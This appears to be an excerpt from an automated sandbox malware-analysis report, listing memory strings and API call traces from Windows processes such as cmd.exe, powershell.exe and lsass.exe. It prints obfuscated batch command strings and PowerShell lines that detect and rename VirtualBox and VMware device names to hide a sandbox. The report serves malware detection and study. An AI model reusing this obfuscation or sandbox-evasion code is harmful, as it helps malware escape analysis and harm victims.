        Source: cmd.exe, 00000004.00000003.1273690833.000001B78054B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %IrsJhdgIOGykJxlAOiVZaTEYaOLXYjjsLDVcNxEBGjXHwCYChZQIeYQOMuIssjJFwgyfCjNrEttQVXByQiPZtBnNMgqsOljwAslpdSaYmzeLEaSPSkCjtKlVTLtv% "g%ibeSqomcAHWJLBLukhTWkmmwwnpSgFSanUHqbOXEFJeBsrXJ%H%PfNYHpIWPIwcZtVUOWvQTvsvkprBhLdeqFcbSUsYlLBssUFl%n%OjMwVgQuMsOsYhOdErMtqUcUDxEhTadpKfNXZHjjOHozgZZe%T%WyNahlUThRSyBIBMpyIStQdXiCFIGCOExAlvmciykTQhPKIf%R%gBkHqgKfuQRFGmnEdnaaxfAmqkIAaWhxUzCesgnqPfbvkDSY%L%GmdCJHHbaYrgykfyJtKgJimXZJkseebNrJTNSFOmRAdtOgSF%E%ZDMQSLoxagCZwpWVWEPPqrFdFypieSiSRFsBskUFuwNMcOPC%i%EhxkrcoHXIktwfshXJiRWvDLJjuUETbRINEWvYBOqLDJZBjp%o%dFOtGYFiELBiIuddHtLJAvMZitAlRUMiaeQYeHlJhwsJxtgW%a%HzbGPzOISPlmyurJZshDEfZahbCeccCPmEDrSfsAqhfowYlM%I%fIKelCrBAbzOXJFPnwZUQZRTaHnwZKDiQQZusxDKmcRQGECG%l%CpbaZqVfRReDpVBPyqXhKlxPSpHOhbnveGUKJDjzUTCBtZuq%B%AbsqGvWqRlhJJgXQEIzJbRgUhymQIWwSUqogIWOIJDSyvzQN%z%VMXKALpIVxiiigHVOoPsSRhHUQZyZHyHHyUWZMsibFllOFzD%X%VWJhKyVeFqQJMRJnYBBKlLWcWGqmGWToqvCcYrXjDPqJVIvj%f%WXmmePrjaHkdhIyJxBtroHpHErhvvngokgqIJGjBdtbqhTbU%B%rHlupeVpIFINIWONBWSbsP
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %IrsJhdgIOGykJxlAOiVZaTEYaOLXYjjsLDVcNxEBGjXHwCYChZQIeYQOMuIssjJFwgyfCjNrEttQVXByQiPZtBnNMgqsOljwAslpdSaYmzeLEaSPSkCjtKlVTLtv% "g%ibeSqomcAHWJLBLukhTWkmmwwnpSgFSanUHqbOXEFJeBsrXJ%H%PfNYHpIWPIwcZtVUOWvQTvsvkprBhLdeqFcbSUsYlLBssUFl%n%OjMwVgQuMsOsYhOdErMtqUcUDxEhTadpKfNXZHjjOHozgZZe%T%WyNahlUThRSyBIBMpyIStQdXiCFIGCOExAlvmciykTQhPKIf%R%gBkHqgKfuQRFGmnEdnaaxfAmqkIAaWhxUzCesgnqPfbvkDSY%L%GmdCJHHbaYrgykfyJtKgJimXZJkseebNrJTNSFOmRAdtOgSF%E%ZDMQSLoxagCZwpWVWEPPqrFdFypieSiSRFsBskUFuwNMcOPC%i%EhxkrcoHXIktwfshXJiRWvDLJjuUETbRINEWvYBOqLDJZBjp%o%dFOtGYFiELBiIuddHtLJAvMZitAlRUMiaeQYeHlJhwsJxtgW%a%HzbGPzOISPlmyurJZshDEfZahbCeccCPmEDrSfsAqhfowYlM%I%fIKelCrBAbzOXJFPnwZUQZRTaHnwZKDiQQZusxDKmcRQGECG%l%CpbaZqVfRReDpVBPyqXhKlxPSpHOhbnveGUKJDjzUTCBtZuq%B%AbsqGvWqRlhJJgXQEIzJbRgUhymQIWwSUqogIWOIJDSyvzQN%z%VMXKALpIVxiiigHVOoPsSRhHUQZyZHyHHyUWZMsibFllOFzD%X%VWJhKyVeFqQJMRJnYBBKlLWcWGqmGWToqvCcYrXjDPqJVIvj%f%WXmmePrjaHkdhIyJxBtroHpHErhvvngokgqIJGjBdtbqhTbU%B%rHlupeVpIFINIWONBWSbsPZQsRnVFYzKqneNbMYglbaeXwSh%m%EoPlbZBCIvbxQZJJfYwvRbLOXMPrPUTWZgqqioIqLBeGKBql%%vRAUUgLcdCeQ%i%qZZZxpDCanpkjNNBeyJItAQpgJqWfdwvEayVTWBRNOi%"
        Source: lsass.exe, 00000012.00000000.1499622184.000002158A013000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000012.00000002.2532164711.000002158A013000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1502675685.000001E89FE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2511771248.000001E89FE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000000.1529397112.000001478602B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.2520664001.000001478602B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2504955179.000001DC5962A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1530485321.000001DC5962A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1533680006.0000016587E41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2522479942.0000016587E41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2549732991.00000220C2037000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
        Source: svchost.exe, 0000001B.00000003.1573742854.00000220C4585000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c29c2bea38880a8a16ee9f37bec9PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %IrsJhdgIOGykJxlAOiVZaTEYaOLXYjjsLDVcNxEBGjXHwCYChZQIeYQOMuIssjJFwgyfCjNrEttQVXByQiPZtBnNMgqsOljwAslpdSaYmzeLEaSPSkCjtKlVTLtv% "I%WCiHrqSWXjkadKMksTVgcXnFGZjzecgIYTTuIJSJwwwCEYg%Q%mCemSeBMZoCbrgtSVcCbjRsCIbmKFBKaHTXWZPoDxgUffIA%W%CcEAzcWWukBDRSRhxDCuyiwSfOYEcXmxaAJHbalYLWCMylw%Q%LGZwBDobuGLuKdsTxYeDqikfxsDJCFKuUsnYdBKTMzpbpFA%r%VscfNtIfCwUYjaFzOVrArPtQWnlRRTiPRRHqzAWamnLCiCB%j%ThaAfYeigZliAiQnInehrsoZoZqoeeRHuMrJRtdQMJBqnrw%Z%SvZcpeujASalgHQebiENNQhwpjnuIRYLWCyTfbBDaDQRQhX%p%iWEziJDJboCNfQZBJUopDjWYaGaNkapFimeydrPcsTxFCov%t%NabhXCRtZZGzCIQybYWETLAxselWKLqwLknNiSsdqSfyxRm%t%uCuwHFJCbzDOSqVInIjNsucqiGTobFbaASRtqpJQbIlnEeA%M%MujRQndUZzeobMvBvxDoazBsYZtMKiPLdfgTROlNwXRTlaI%P%eFgPPbPAnTQSQUrkRKskVFCJHlQRcHHgYqogDsaKnFTaaWu%Z%SfMajTQNydwiDkYxFlJUAFkHyKHWpMCJLRXMpHyniDPcgkw%j%zpinOqbUnUfCzlTxMBNxMnlhYNwMWPiAnniHgzNtJWJSkfY%W%bofdBtNJlebobTpXxLFoldmrnOuNQDsXTOuxRMHhADWCflM%p%zuYlgFQNYcOQMYZTILeumyRgLexNHgJlbbUtRrlrdbwucVU%p%iBKnQaQAaCSAbhdfRtCOLeGcqAMrkcwdPkpmXSSklBUQZRj%E%kZWFbAhieUHXqozpYgPKRSRhYAsDkjQdzqCrowuDIckrpVB%M%WLlVJjgsriOGAiEYUeExaMhbBLmcOHzRcYvRYngTsXkizPU%a%vddqmLyBjEkuYXeDKJXECMMZGYLedCYCLRQYLrmgExlnOTi%H%VotzzBlsIrdJoZtyHFIIhgfSswRZeAzlMPQQJcyaAziHHHX%%vwCsBkjB%h%lYEHflaOiAhdKlniRRWyjCOFgIiHYylKyKOfWRgBP% %bHiUvpolZPPLzWIkYBxcsPKowFZxhmaLuJhVFKLsU%$%wYIwZZNfVXqIzwmWUyQpQeNPdqPPNEoPfiWQbSxFl%r%rloJdVnVYLmVcdrlTtJjYsrJADrzvVbakeySzfZuB%e%TPSbUceEFhzOwnZUFiAEOAdKlLYEzMOtoIfCzHGAm%g%UPNCmNRzXTWzQMsMhQieAfTtgANhwuXCZsUKpiYXh%i%fBSSTxVMQrQywLPWtvMaJcDWuAySIwZRlXvDaBmcS%s%vFdgeCGfOWMmXxcYWxtZceurZmzqmVSjJinwzPpXR%t%NTAnFozsEedTcPrlLhRdqTSdDCOkGzghvhpkUetYa%r%XHROpGtWlOHyTBUbwKdzpMeXVxVzgqHOSdslbpnVv%y%nuLyJBGvjytpzLkCTSRLTPUgTFQiJZgwidbrtzmWo%P%eXSnytrhIiwwjCxAEFdLyLjrXhvJTjtGVxORbTvmy%"
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %VcLdwieunwyzzIoSzRghvRTgVqlnrEonZpKuFNdxayIekoqlofFHQnYdiEigXQdJilAjYTnMOIhWiPWGaaZl% "S%vWWWaLrEWFJwyJAJLZUWvQhDDDdJJxyMQTyuuhVssN%F%SjbVEJweHslTPFOtsxHHVzhXGFkfpDdCDHXYBIZumE%e%QgBWdSGbPyKKSsceoYyqPdoIpiIQRJynuqJavKBszn%U%NFSSPFWwuaVWPMSSGVkPjgawqBJbJEwgQBpIQxsdTu%r%oxsyBWiCdGhKeHFvCnVVNQDOfowjcjChWORCeRaMSg%q%AQZgwIdvUfhYHxUDtnzYATeZNpPdqKnjcGpNPYROgH%d%oxaXhtHByMmTGHLashSaekRYWaihNvvKSTFHYQhvvP%W%mAWiaIbPFJWgCeFcbhlANdrBbNbebCZwEoYqbNZzfY%d%PLOMqBbWPakUcijuhmGXOcKABofpanhMvPnFNpxAce%J%NYmKmPgHGNShkNbokcvLWBSyymVEHRPgUJpLnQbqjt%s%GuTnFADyevfrimgOmZTCZOXMnAxpatafCDUyEkHvai%P%MubDBdFzEbwHtRwhaecnyLuaOErIjbsyBRcDLJYuKB%P%OZIVjcbxkCtMKbZbPWLXpDJXfCPTvrgHDWWvrTvoGL%L%RPfOhaEKUbJNllpKPHnibSwLjNfEJVBxqEMUSrvPoL%r%xeYPLLfGeNbyJYstFtVaaZAmxHyvSxmxTqvsNtbtyd%c%QNvRUNBzLbUoLyEMsemKOGBEFtDaFlrBBWiMQFNLTt%t%MkDEEXNbbXgOpklRmAkBTAJsNOpRVNrBQvUqaaOFmE%X%kuuMHXAZsmAsAlBkRQHVgoGFYTpVQmLEooqpXagrrW%N%uebxUIPPiYYqyWNPONIFigAVdlVlnRKpEjTBDAYGfb%s%dNGXQuBhmsJLOoDfuJNDCroIMoclloObzgcNofuBJf%r%ErGSvFYygpTByMyYlCrqWYDHlHmPQoomTwMWcTSxnN%g%hziYHqoqUSjtjGOYGOtiHSaGHbZCWrJUcjQdznZVBA%P%twcAnfidmddefpzBqGqMuCioqaQKytPxHhyEEhOTtS%%iWWxWHac%T%FQYdAEXXtFOfQnNjnpyEToGxXRVXiRwtCxCysWqf%J%BwwSTcHqQYAEUnlrkAgJJaOBiuDtLpQrYtdxSOEV%l%jEgkrSypmlnRQHvAHUKyzoEBhiFBjOywWkzeUDjq%)%VohAcZBrYDPXdfwVaFdjmXfyMQVFhqGeLuCkheyi%{%HoCFYBsQODeoAadYiINldVjHXLmJDlOVgVBYvzzl%%yeRElrELqEcyqneMeVInpInDPiiEzfCIjCMZeFvG%I%hBtZjqFSQPUzRmWPRoPciZlkbtoNAfHyzcgNpotz%n%DpOJldRXGXhQQsxhpiXPbRsLhvaOgiADUpzTlBZY%v%BrhDXRHgEYygqEyMXcCPccQywEWATEWNjZnJKPNq%o%NUkhJumpRNViZjWzAIgtVhmacLWrqObipmchSJOc%k%rGIgINNZcOibItvGHjfYxVYdLNSNhOGRTecoygro%e%XXoCFZzWRvzIEQFvHFuVVaSoiriErgiBSQaAHwxL%"
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
        Source: cmd.exe, 00000004.00000003.1289620833.000001B780556000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %VcLdwieunwyzzIoSzRghvRTgVqlnrEonZpKuFNdxayIekoqlofFHQnYdiEigXQdJilAjYTnMOIhWiPWGaaZl% "n%tHcYIkgfPJYXQJqaQEXCjMVqeookffHfwLtIhiEkRUBc%v%xbKeUSegnwnHLLTtWVZKcSAfqHSHZMLokSTdEkpmbASa%X%xLXvpkoVVRaEAFOmawhALYwSSQPLGNJBaAHEKwsOyPtt%a%SoDYvcmEtrozoeCyvCphhzDZYjCDescVEdaDmQpDBeiJ%r%miqFTTtVAmltLEamAIzaotUleZmEmLGdrUMPTWJlYgus%M%RGSIQddSEhuTneAUGPJPGicQRktDYochYCtxgEOjHNyk%v%zTCOwOEjxFMJEbQFKATqemUKLcOcbAhSJRrXHEhjJSKt%Y%QJSeOiyhThfmZRdtaCiWxTZMKSXfsJHmCBUbkJoSbZYB%B%MeYQBOjgJNVWKfuVltOjASKyXcjqoqVxUxaGThEEAACO%O%FXrepsHIlObUtASzFSStSybmfNbdOkJaqVSZKebVInmf%l%wfmtofZHHiWgVeYBqDTbfaEyHTOARXLFmWPaBIPJkbth%S%YMdFgzEetlawBNLurzQJxrUZpYaIOkQdHwzVQitssGla%U%VtyOXusLlJKHRdqizWqiuWPfoPEifyrQfTdWzlLuSfSX%K%MSeMSlSwqdGZEtzhPjGMsTBXZtInlVqpdRtwLSqTFUAc%k%nesgMDFJyfFSqgMyDFlvMrWMZdvXSMhxtyKVbBAHqGQX%Z%lAfEfSqZJfpWiFhJhHRMYizRwQxceDfgAYBzXRSZwiOo%%WkrpsVSLflw%y%ONvuRzIPeZdbniovnUfajvjdHMqPRpQtkJIcbHndw%"
        Source: svchost.exe, 00000024.00000000.1595581623.0000019104A02000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
        Source: lsass.exe, 00000012.00000000.1499735658.000002158A08D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
        Source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
        Source: svchost.exe, 0000001B.00000002.2542887231.00000220C1FC0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %VcLdwieunwyzzIoSzRghvRTgVqlnrEonZpKuFNdxayIekoqlofFHQnYdiEigXQdJilAjYTnMOIhWiPWGaaZl% "o%RqlVbRhMKwluBjQvWvoWrZFzCAlvkOogBthdaedwhDjYKlul%o%dkmtmfARKMsAGMBVieThbNvSrSONQHPqgaraCVUvTpsoLDQv%q%bnPFrmjqOubuqMbdXcuFuBtnkyoLuggObtLCRjYTQblhTzeg%T%oprJjkaAUCuTYxVHnmsXbylNdBOtpltLthwfPxFQslIpOfUs%v%fDTGghfQdEGIwHkIiJAQbQSPHBFQPVYXGvoMsMEmcGblRXuL%V%aahfFeroLeZFCobiFIbatyqvfnNuOHYKhTPONTsCdZanNZKO%G%ETFjVtsBKLZrqXzdfpxIznuMpzXtxcIgDZQVbPONBndcTblg%V%zWixBcorzTTwwYeIdTOqgEbqAKgljsTonQTATkEAKywiVsqD%u%juYZnUZVUSWRVdhhaFiGfDPSpnGIhTuitDbPtTatQXFbnNEH%U%qpiqjKyGFfJZorNbxOxsbsNgEPPhXNECIYrSKeYJfvjnjbez%F%jEDzplFYBcLuUqISAhrpZUrtPOnGjzWDKpXtjfmwttrHsDOO%j%MrMcJOzomkKBYZPbgiJFtpIvUUWGDJblZzTRNUTWPIgZvLyu%O%EpBjUjvwIrhPSTLCiyByfXolpNPKiJajwCcnhSrQdwjwMeeW%B%XDQWkZoHbqUguKoZqXspRxvqhKuINSylJSNESeZwnvmRXkwt%c%ijfPLOfzizOzEFTjRIxBXJgmYVcwlDsWobAEMJzVNnwspzSH%%OsTKKwdkgv%e%capNUvzdTQPMJoFhSlCfpwhiCOKnNWzduUiCdjtGaATTK% %jeYQlxopCmFSgkgLmpWrLrOgcdISWeODoytJLwCzlNSHC%-%KXYmVOlWCYRpSOhOvtxycEHRwZPMxgXzgEsfJGapCHMzB%W%uSIuKPuujAfqgPVYyzwariowbePshVuShpcghsMqDfXdm%i%PDQfrdiqzklEmsFabmnfniQMORgMfwmlkjlBYnQRlBIfR%n%CVZgqCSKXYHMdqzXvkcXatcgebOwvTMzKVmVhFPUuBmlE%d%PUWqUQrGiRiTScpOwoemibieDPPvhDzhQCogRfBduTCed%o%coDzgXmiZwOMSMeaVzErbcpOjWqMaRoyeaBAmVaFmYRgA%w%uZswdytYMcaYPqkHAihhpHRlDNayZfckjoOXXqWsVAsYA%S%CxEQYMQJZkMihSqyVYHZPPABmJklPmPpSLbpvIasmBkdc%t%PQxGUZBKYKMWcDoCEUMvxpvQacnXoNoExzxTMFVmnETao%y%steMQHHxIFzuGFRMDwlwizDgvPYYAhSvvCHJilxfGgOUY%"
        Source: dwm.exe, 00000014.00000000.1510270449.000001F084360000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 0000001B.00000000.1547344289.00000220C1FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c29c2bea38880a8a16ee9f37bec9PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: powershell.exe, 0000000F.00000002.2576629419.0000015207E82000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %VcLdwieunwyzzIoSzRghvRTgVqlnrEonZpKuFNdxayIekoqlofFHQnYdiEigXQdJilAjYTnMOIhWiPWGaaZl% "H%ADGVSRVxMGLPtPKWbHMYyzVHDLOaYBgFMJgvniimbOqpF%s%wjnUTtdpIdaIYshcUykAfcKIpJTzzXKjGcgBBffhcqeFf%l%NoPbkgqfOztzEFjAEPKtRbVlFAPtcyPYfCBudyoRtdSDN%G%cXzVHyBtloLtDvKqXdqJvubePwfATaNjryDCpxvZoEUoQ%Z%bzcEAwaCTsHVvgktbzkACbfShbzHqvQANoNXcVtDNHxgV%T%HTrkGneJNnaukwyXslyBhihsnqfgHMVDYXAhhxJiLRZaN%d%CSzUGvvZENyMZXqhYbasxvnWrPUBpPqihEKxFlbrzDtjb%b%viztaMPZHqgFDDQATJOxqEumSBNaJSTbdUVHviocAjzoD%e%ScHkRFTELKQNnByZPqPxeBIHjfLvMXhfgIZzfPRmZwsjf%W%ThGQdLTKQyruZbMUySODLHEBZTayCxHjyCqXeEIlovpkI%m%fgNfsBEDGulDfQjKuitQiVwLOPTkCpqruTUNmsjWdGSie%c%tZOzBTmWtzjJcqCHuaqdTjlWwybYxNCcoGuPfKbvdvbuK%V%ejbGoJFBelkOSccRoyGXhvwWNBJYVaxiRlrparidWAjvk%q%bnIZEOXvwDJMfTNaGGeNcXGKNRWqCaGlbLLobZqlANuII%l%CUxvcpTfHhdGXmMSGSvWxLuiyZHqSmpCYckXyVzLNgtDH%D%HdNDtUUZLlQApWdIDmvSBIVbPtKsKjqsQAQVTMysuDmQt%c%wjYwcjTYLgZiMOajBpCUyJPghPRNcxYveHsjMWHZxuftQ%F%NhYyjTnKWVMuSonsgVniDeevQxEHCxeEvpuHSoTEKLiMF%P%PTHuHrySlmIcDIMoGhzQiYCUFzRcIySWsPaDXmVgGMjcL%v%EpGhqdDIVxQrNPhzvjNuMKNHirumskvPziakkVruonxrj%L%mjxOGkDwHYUBZYZJrpKcbRFOWpARtgznwxWhWxMaStSjg%b%IlWsLWXMpiuEIRqJLcBzGfBbRMUDJkIZvHoeEzHkCAgpB%G%DnFvrgqqKzDJUAYctdfzviaDmflvrWfYmAnyohrdsILiK%%iWWxWHac%a%JZIiixbPfvmcimVUYNtExumANlLbhNxSSSvmMjOIWwu%"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BE9490
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE175C GetProcessHeap,HeapAlloc,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,RegCloseKey,4_2_000001B780BE175C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\winlogon.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BE9490
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_000001B780BE97F4
        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BEDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000001B780BEDD1C
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_000002640732DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000002640732DD1C
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_00000264073297F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00000264073297F4
        Source: C:\Windows\System32\conhost.exeCode function: 5_2_0000026407329490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0000026407329490
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE5297F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00000234FE5297F4
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE529490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000234FE529490
        Source: C:\Windows\System32\more.comCode function: 16_2_00000234FE52DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00000234FE52DD1C
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_000002158AEE97F4
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEEDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002158AEEDD1C
        Source: C:\Windows\System32\lsass.exeCode function: 18_2_000002158AEE9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_000002158AEE9490
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01ADD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001E8A01ADD1C
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_000001E8A01A97F4
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_000001E8A01A9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_000001E8A01A9490
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F088949490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001F088949490
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F0889497F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000001F0889497F4
        Source: C:\Windows\System32\dwm.exeCode function: 20_2_000001F08894DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001F08894DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F797F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000001AC86F797F4
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F7DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001AC86F7DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001AC86F79490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000001AC86F79490
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FBDD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000014785FBDD1C
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB9490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000014785FB9490
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_0000014785FB97F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_0000014785FB97F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D197F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_000001DC59D197F4
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D1DD1C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001DC59D1DD1C
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_000001DC59D19490 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_000001DC59D19490
